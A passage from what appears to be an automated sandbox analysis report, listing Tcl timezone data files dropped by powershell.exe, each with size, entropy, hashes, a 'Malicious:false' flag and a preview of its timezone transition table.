                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Lower_Princes) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1539
                                                                                                                                                                                                                              Entropy (8bit):3.7453889877550512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QChlvEw6kSSx5H4a8tf3fkuoLdNYVZDNR8nd:OIlvEwJSSxdF8tfMuoLdNYVZJR8nd
                                                                                                                                                                                                                              MD5:EB0EDF4E075E3CF9F8EDF2B689C2FE54
                                                                                                                                                                                                                              SHA1:9713D7E8AA0E7164824657D00DE6C49483D2BD19
                                                                                                                                                                                                                              SHA-256:F65C5957D434A87324AAD35991E7666E426A20C40432540D9A3CB1EEE9141761
                                                                                                                                                                                                                              SHA-512:0A0D1E4E0BD7D854E8F139E6F7A9BBC66422B73F7A6C2E1F1B6D2CA400B24B3D220AB519B6AEAA743443E9A4B748709CDF2C276BF52C5382669B12734A469125
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Maceio) {.. {-9223372036854775808 -8572 0 LMT}.. {-1767217028 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):611
                                                                                                                                                                                                                              Entropy (8bit):4.303621439025158
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290znTjmdHOYCvprv5EU/dLAyW+/uF+kX8/uF+RZ//dAWcP/QAWcx/uF+rbE:5GnPeOdvhxD1pLS+S8S+RVqzo4xS+3SJ
                                                                                                                                                                                                                              MD5:FB09D1F064C30F9E223FA119A8875098
                                                                                                                                                                                                                              SHA1:C66173FEB21761AEA649301D77FBB77ACF3A6FB1
                                                                                                                                                                                                                              SHA-256:F0F0CCE8DE92D848A62B56EF48E01D763B80153C077230C435D464CF1733BA38
                                                                                                                                                                                                                              SHA-512:BC3D841FF48FD0DE7C9ABF5DAE3A42C876BD4D7FBD6684B4513EC7ECC92D938A7133BCC873AD46E453DD1863E843E5C7DD14FFDB41B593E90BEB5CD8F7E66202
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Managua) {.. {-9223372036854775808 -20708 0 LMT}.. {-2524500892 -20712 0 MMT}.. {-1121105688 -21600 0 CST}.. {105084000 -18000 0 EST}.. {161758800 -21600 0 CST}.. {290584800 -18000 1 CDT}.. {299134800 -21600 0 CST}.. {322034400 -18000 1 CDT}.. {330584400 -21600 0 CST}.. {694260000 -18000 0 EST}.. {717310800 -21600 0 CST}.. {725868000 -18000 0 EST}.. {852094800 -21600 0 CST}.. {1113112800 -18000 1 CDT}.. {1128229200 -21600 0 CST}.. {1146384000 -18000 1 CDT}.. {1159682400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1166
                                                                                                                                                                                                                              Entropy (8bit):3.7842934576858482
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GnqeKwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQz:5mSeSFESoSQSrSsCSeSPS1cSQSQlSsSQ
                                                                                                                                                                                                                              MD5:E42719A9B0165490BB9E0E899EFB3643
                                                                                                                                                                                                                              SHA1:2991D7EC31F47E32D2C8DB89A0F87D814122DD1B
                                                                                                                                                                                                                              SHA-256:DC54E6D4FE14458B0462FA0E15B960FD4290930ADC0D13453BF49B436ED8C143
                                                                                                                                                                                                                              SHA-512:F75024E27A2D679A667EA70EC948F983C7B823FDA5962DD88697D61147A6C2B1499E58BA8B01170653C4D025900491AE8E21925500DE39EACBAF883F7E62D874
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Manaus) {.. {-9223372036854775808 -14404 0 LMT}.. {-1767211196 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.900738604616686
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zzJ/90ppv:MByMYbpwt290zzN90b
                                                                                                                                                                                                                              MD5:8C60DE8E522FE5D51EACD643FD8EA132
                                                                                                                                                                                                                              SHA1:2E09A71DF340ECA6F7AEBD978070D56A627049EC
                                                                                                                                                                                                                              SHA-256:5C26D7CE93F91CC4F5ED87E9388B1B180EF9D84681044FD23CC01A628A1284CA
                                                                                                                                                                                                                              SHA-512:D2D522D041AFA638542F6FF00F5F40325E3F117C5035BA71F676B4956B054542C67A753055D17E2E2EEA925F13EACC0969D01EC18E40D274D8EA408F92777EA2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Marigot) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):251
                                                                                                                                                                                                                              Entropy (8bit):4.849143012086458
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290zlEDm2OHfueoHv9dMIqR5lRfT/VVFUFkmR/lAov:MB86290zimdHfnCv9dMIqR5lVb/uFkmD
                                                                                                                                                                                                                              MD5:CFE10EE56115D3A5F44E047B3661D8ED
                                                                                                                                                                                                                              SHA1:03F598CFC9AEDE2F588339B439B2361F2EBDE34F
                                                                                                                                                                                                                              SHA-256:D411FB42798E93B106275EC0E054F8F3C4E9FB49431C656448739C7F20C46EDE
                                                                                                                                                                                                                              SHA-512:25D6760FDF2F1B0DD91A41D29BDB7048FAE27A03F7B9D9C955ECF4C32E8402836D007B39FE62B93E7BEA017681A0C8AFC1C4CAFD823B0A6C41EDAF09DDF3435D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Martinique) {.. {-9223372036854775808 -14660 0 LMT}.. {-2524506940 -14660 0 FFMT}.. {-1851537340 -14400 0 AST}.. {323841600 -10800 1 ADT}.. {338958000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6745
                                                                                                                                                                                                                              Entropy (8bit):3.8432520851585372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:aD5NA604qSScBgN+4ctDzIVQ/c/3hNxTh:aDbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:FC4A24AE95BA6E36285F09AB2FCEE56F
                                                                                                                                                                                                                              SHA1:54ED1CD69247064B5EC775E907790D19E93A4626
                                                                                                                                                                                                                              SHA-256:59C658CEA1BF5392A8F16295A09A74230EFB52EF7BF783E493E9A9C1799036F2
                                                                                                                                                                                                                              SHA-512:2E8E65C487090DC8EE90F8575360A00E74C134CE34E83D4296E2CC32B773F9F0151F4049BFD1BEEAFE7B441E8684AF9FB50287E42FBD5182E4051D1FC39932E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Matamoros) {.. {-9223372036854775808 -23400 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2067
                                                                                                                                                                                                                              Entropy (8bit):3.990817847620547
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5GtXed9WUQwuz/V/NF01YmM/parZ375+XiB+:5sNUIdFS1YrpaV5+yB+
                                                                                                                                                                                                                              MD5:43467194416FCF6F0D67AD2456D78646
                                                                                                                                                                                                                              SHA1:1FDF02EF7354D9DB71F545D32AE52D018E99D801
                                                                                                                                                                                                                              SHA-256:8140084EA9D6A478C34A114D9E216DC05450ECBE4809B2CDA194B40452E2AA0F
                                                                                                                                                                                                                              SHA-512:EB5CD3E95779391F096EE9A7B16920C6C9E8A90F38C7A3CBE2B0E123D088A127C5BBE21F5883DCDAD4FBB2410ED052EDE3D4F1E260483D97FEBB7BA7022874C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mazatlan) {.. {-9223372036854775808 -25540 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -2520
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.812188311941308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MeHAIgp/MSvYovN/290zpH+90/MX:MByMY/M/p/MSA6t290zpe90/MX
                                                                                                                                                                                                                              MD5:2A3BFEEFBB684FB3B420A6B53B588BDC
                                                                                                                                                                                                                              SHA1:CC5C0BB90D847CCBB45688A8DA460AD575D64617
                                                                                                                                                                                                                              SHA-256:D6B308A1619F2DE450DACBFEF0E11B237DF7375A80C90899DD02B827688CB4B8
                                                                                                                                                                                                                              SHA-512:4A35C80D3454E039383FFEB06DC84933B3201BE2487C42A448AF3DA5ABAEEB9882263C011CDD3194E121EC1C31FC80120BF7829F280A79996E376CFA828EE215
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Mendoza)]} {.. LoadTimeZoneFile America/Argentina/Mendoza..}..set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8410
                                                                                                                                                                                                                              Entropy (8bit):3.8311875423131534
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:6quShLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:6lSUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:C74D31382279219F805D2B138C58FBF7
                                                                                                                                                                                                                              SHA1:06E2FED0A3BDF62F3D390A4054B6A2D7C1863DD3
                                                                                                                                                                                                                              SHA-256:B0863F8B66F0848020651B69E7997307D62209259AE653FDC1A0FAFC8E793068
                                                                                                                                                                                                                              SHA-512:7B42CBDC119651E2B2EE8B8F934801D3147A8B72EE060A0D0EA1C0C12CA9ABD03F1A102A85BF8E7424B45620151CE107D16A9173F4AA7597EDB3109840C1B2AE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Menominee) {.. {-9223372036854775808 -21027 0 LMT}.. {-2659759773 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-116438400 -18000 1 CDT}.. {-100112400 -21600 0 CST}.. {-21484800 -18000 0 EST}.. {104914800 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200 -18000 1 CDT}.. {278492400 -21600 0 CST}.. {294220800 -18000 1 CDT}.. {309942000 -2160
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1877
                                                                                                                                                                                                                              Entropy (8bit):3.9636871490767147
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5bu36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:1qehpYtj
                                                                                                                                                                                                                              MD5:34909341A29FF048D83B707D12A728A5
                                                                                                                                                                                                                              SHA1:A4D4EC31681DB5F9DA899E20C6789D10827E6D86
                                                                                                                                                                                                                              SHA-256:ADE65ADDEEA027D1BE70DC7C12513B61FDF36289021E66982D527C7FEE2A2D19
                                                                                                                                                                                                                              SHA-512:57EED40425680CE2C05D961D3F21EE2E0D204E1FD6D3DB5F1EF7AC349AA269F9397D4E2121BD13BC3DE34205564FBE009CEEB5ADE4052EA742CBA15A91F5822B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Merida) {.. {-9223372036854775808 -21508 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {407653200 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6705
                                                                                                                                                                                                                              Entropy (8bit):3.985641709481311
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4DCG0haiaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:42G0IiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:4999FE49C1640402CB432BC1EB667479
                                                                                                                                                                                                                              SHA1:2ED0044927A66856090793ED6E5FF634617C8C40
                                                                                                                                                                                                                              SHA-256:2574831391092AD44D7B2806EEF30D59CE3BAE872111917DD39EC51EFDD62E5F
                                                                                                                                                                                                                              SHA-512:39DE1D24037F3FFA3101BBAA885939074E596479F68013CDA9CE53A061EA704F63FB55C15B68B66B0E29E3F07ADC0BDC2D78A2D289277E75D2EF95F54988DB74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Metlakatla) {.. {-9223372036854775808 54822 0 LMT}.. {-3225223727 -31578 0 LMT}.. {-2188955622 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {30
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2261
                                                                                                                                                                                                                              Entropy (8bit):3.9546083289866267
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5CBUBUI+n36fELf5On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:EB7qehpYtj
                                                                                                                                                                                                                              MD5:7A67EA7FF5AC0E9B088298007A9370F4
                                                                                                                                                                                                                              SHA1:531583F67E0C6ABA95B5A664A555BF40BF743CE8
                                                                                                                                                                                                                              SHA-256:E83DB749E6AA87FD56829C2810D0F93A4194E3EE2CB0BDC12114B1EF55E92E96
                                                                                                                                                                                                                              SHA-512:2C9035B415E36A769782FCFA15D79E5FEACA232439D1442407C8CD8C144EE9991030D9D58D2AD54CF6C0840BF78C81921B82BECBC74ABBD0DAC627F77772F52F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mexico_City) {.. {-9223372036854775808 -23796 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-975261600 -18000 1 CDT}.. {-963169200 -21600 0 CST}.. {-917114400 -18000 1 CDT}.. {-907354800 -21600 0 CST}.. {-821901600 -18000 1 CWT}.. {-810068400 -21600 0 CST}.. {-627501600 -18000 1 CDT}.. {-612990000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001836800 -21600 0 CST}.. {1014184800 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {10357020
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7080
                                                                                                                                                                                                                              Entropy (8bit):3.5379714312244217
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2UViR+iORv7bw1aW5AnMyxH5e+fHbxMfOp6D7bF8qMmqyiqV1mjZe7JhlgXY7FWN:02l5qJZS
                                                                                                                                                                                                                              MD5:C68889AA813C399939FCFA54E9CE0DFB
                                                                                                                                                                                                                              SHA1:F3D58D7BEFF2D1CB94FECE00C31FEF5BDF58C231
                                                                                                                                                                                                                              SHA-256:1B131AC968F95652667BD7EB1F6D667C8F679B31270D82B4B4271E787386CCCA
                                                                                                                                                                                                                              SHA-512:EBAF8210919E34668E9DDFCB546E5A62F35954957AAE956B6302BF296C7D4CF51E1B10FB13217CB3EEB430DAC246217EB4E9250CB4109C95D8A4367457D02771
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Miquelon) {.. {-9223372036854775808 -13480 0 LMT}.. {-1850328920 -14400 0 AST}.. {326001600 -10800 0 -03}.. {536468400 -10800 0 -02}.. {544597200 -7200 1 -02}.. {562132800 -10800 0 -02}.. {576046800 -7200 1 -02}.. {594187200 -10800 0 -02}.. {607496400 -7200 1 -02}.. {625636800 -10800 0 -02}.. {638946000 -7200 1 -02}.. {657086400 -10800 0 -02}.. {671000400 -7200 1 -02}.. {688536000 -10800 0 -02}.. {702450000 -7200 1 -02}.. {719985600 -10800 0 -02}.. {733899600 -7200 1 -02}.. {752040000 -10800 0 -02}.. {765349200 -7200 1 -02}.. {783489600 -10800 0 -02}.. {796798800 -7200 1 -02}.. {814939200 -10800 0 -02}.. {828853200 -7200 1 -02}.. {846388800 -10800 0 -02}.. {860302800 -7200 1 -02}.. {877838400 -10800 0 -02}.. {891752400 -7200 1 -02}.. {909288000 -10800 0 -02}.. {923202000 -7200 1 -02}.. {941342400 -10800 0 -02}.. {954651600 -7200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10507
                                                                                                                                                                                                                              Entropy (8bit):3.8204583916930557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:X9+FPHyXFRsivcQYM+T7Z/xVQzxmtBWIXrObx29x8sLxcGMe++wzlrfFjxKvnpNM:gF6L0d0F2TzNc/1cYUH+CC
                                                                                                                                                                                                                              MD5:80B88F57B837CD2478815796618A6AC6
                                                                                                                                                                                                                              SHA1:CC2BE0213E9F0D3B307A8311D7A1013582E8A338
                                                                                                                                                                                                                              SHA-256:D977D045DE5CDAEB41189B91963E03EF845CA4B45E496649B4CB541EE1B5DD22
                                                                                                                                                                                                                              SHA-512:9410CBD706CAABFFF88DFF75235597D844B45A061EBD796F6708D7CEAB680273571A17935B7CCFC7C466ABF293C286D0886F47880E692F74C4E8BFB41729C73C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Moncton) {.. {-9223372036854775808 -15548 0 LMT}.. {-2715882052 -18000 0 EST}.. {-2131642800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1167595200 -14400 0 AST}.. {-1153681200 -10800 1 ADT}.. {-1145822400 -14400 0 AST}.. {-1122231600 -10800 1 ADT}.. {-1114372800 -14400 0 AST}.. {-1090782000 -10800 1 ADT}.. {-1082923200 -14400 0 AST}.. {-1059332400 -10800 1 ADT}.. {-1051473600 -14400 0 AST}.. {-1027882800 -10800 1 ADT}.. {-1020024000 -14400 0 AST}.. {-996433200 -10800 1 ADT}.. {-988574400 -14400 0 AST}.. {-965674800 -10800 1 ADT}.. {-955396800 -14400 0 AST}.. {-934743600 -10800 1 ADT}.. {-923947200 -14400 0 AST}.. {-904503600 -10800 1 ADT}.. {-891892800 -14400 0 AST}.. {-883598400 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):3.9628147491173964
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5JZKy36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:XwDqehpYtj
                                                                                                                                                                                                                              MD5:4AE2B33D9DACE0E582FA456B361C50B7
                                                                                                                                                                                                                              SHA1:5D62287F072F3687EF130BB1A9DD97BB2ABCF91C
                                                                                                                                                                                                                              SHA-256:F5A66A403BF40BE7EAB188F3CEC8D7DB700F60084F7B856AB87E0AA4A0F2C0B6
                                                                                                                                                                                                                              SHA-512:39BE803FD47709A1120FC8E09DB9B294DE41F69C7DD86AAB03AD8D0878B160B21D82B16398125559B792DAE99D5D917AE466C536001FEC1E618B68ACA9A80322
                                                                                                                                                                                                                              Malicious:false
